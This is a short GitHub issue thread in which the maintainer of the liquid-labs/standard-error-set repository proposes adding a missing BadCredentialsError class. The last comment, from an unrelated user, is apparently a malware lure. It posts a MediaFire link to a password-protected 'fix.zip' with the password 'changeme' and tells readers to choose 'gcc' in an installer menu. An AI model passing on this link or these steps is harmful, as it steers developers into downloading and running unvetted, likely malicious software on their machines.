### ISSUE TITLE
Add BadCredentialsError

### ISSUE THREAD

**Issue by zanerock** [liquid-labs/standard-error-set#26]
## Overview

We actually reference this class in the docs in a couple places, but we never did implement it.

**Comment by zanerock** [comment]
Work for this issue will begin begin on branch work-liquid-labs/standard-error-set/26.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
